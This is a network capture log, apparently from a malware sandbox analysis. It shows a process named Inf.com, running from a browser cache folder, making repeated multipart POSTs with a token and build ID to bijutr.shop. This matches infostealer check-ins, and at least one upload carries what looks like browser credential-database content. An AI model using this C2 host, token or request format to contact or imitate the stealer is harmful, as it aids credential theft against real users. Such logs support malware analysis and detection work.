                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.6  49968        142.250.181.68  443               7472  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-27 06:10:53 UTC  498                OUT        GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:54 UTC  1018               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:54 GMT
                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 49969 | 142.250.181.68 | 443 | 7472 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:53 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:54 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:54 GMT
                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
34  192.168.2.6  49988  188.245.216.205  443  6636  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                                            2024-12-27 06:10:57 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----C2DT0R1DBSJE379HDB1N
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 505
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:57 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 43 32 44 54 30 52 31 44 42 53 4a 45 33 37 39 48 44 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 54 30 52 31 44 42 53 4a 45 33 37 39 48 44 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 54 30 52 31 44 42 53 4a 45 33 37 39 48 44 42 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------C2DT0R1DBSJE379HDB1NContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------C2DT0R1DBSJE379HDB1NContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------C2DT0R1DBSJE379HDB1NCont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:58 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
35  192.168.2.6  49990  188.245.216.205  443  6636  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----SR1DJ58GDTRIM7GDJ5XL
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 213453
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 44 4a 35 38 47 44 54 52 49 4d 37 47 44 4a 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 4a 35 38 47 44 54 52 49 4d 37 47 44 4a 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 4a 35 38 47 44 54 52 49 4d 37 47 44 4a 35 58 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------SR1DJ58GDTRIM7GDJ5XLContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------SR1DJ58GDTRIM7GDJ5XLContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------SR1DJ58GDTRIM7GDJ5XLCont
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:00 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
36  192.168.2.6  49996  188.245.216.205  443  6636  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1V
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 55081
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------SJW4W4OHLXBIEU3EUA1VCont
2024-12-27 06:11:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 50002 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:02 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:02 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74
Data Ascii: ------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------3EUA1N7YM7GV37Q1VKX4Cont
2024-12-27 06:11:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 50008 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:04 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:04 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74
Data Ascii: ------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------3EUA1N7YM7GV37Q1VKX4Cont
                                                                                                                                                                                                                                                                            2024-12-27 06:11:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:04 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:11:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 50031 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:10 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q900HVS2V3WBAIWLN7GV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 509
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:10 UTC | 509 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 51 39 30 30 48 56 53 32 56 33 57 42 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 30 48 56 53 32 56 33 57 42 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 30 48 56 53 32 56 33 57 42 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74
Data Ascii: ------Q900HVS2V3WBAIWLN7GVContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------Q900HVS2V3WBAIWLN7GVContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------Q900HVS2V3WBAIWLN7GVCont
2024-12-27 06:11:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50039 | 142.250.181.65 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:11 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:11:12 UTC | 563 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Thu, 26 Dec 2024 15:58:14 GMT
Expires: Fri, 26 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 51177
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                                                                                                                                                                                                            Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID: 41
Source IP: 192.168.2.6
Source Port: 50042
Destination IP: 188.245.216.205
Destination Port: 443
PID: 6636
Process: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Timestamp: 2024-12-27 06:11:11 UTC
Bytes transferred: 326
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2N79HDJWBSJMYU37GVKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-12-27 06:11:13 UTC
Bytes transferred: 158
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID: 42
Source IP: 192.168.2.6
Source Port: 50050
Destination IP: 188.245.216.205
Destination Port: 443
PID: 6636
Process: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Timestamp: 2024-12-27 06:11:12 UTC
Bytes transferred: 325
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAA1NGVKNGV37Y58Q9RI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-12-27 06:11:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
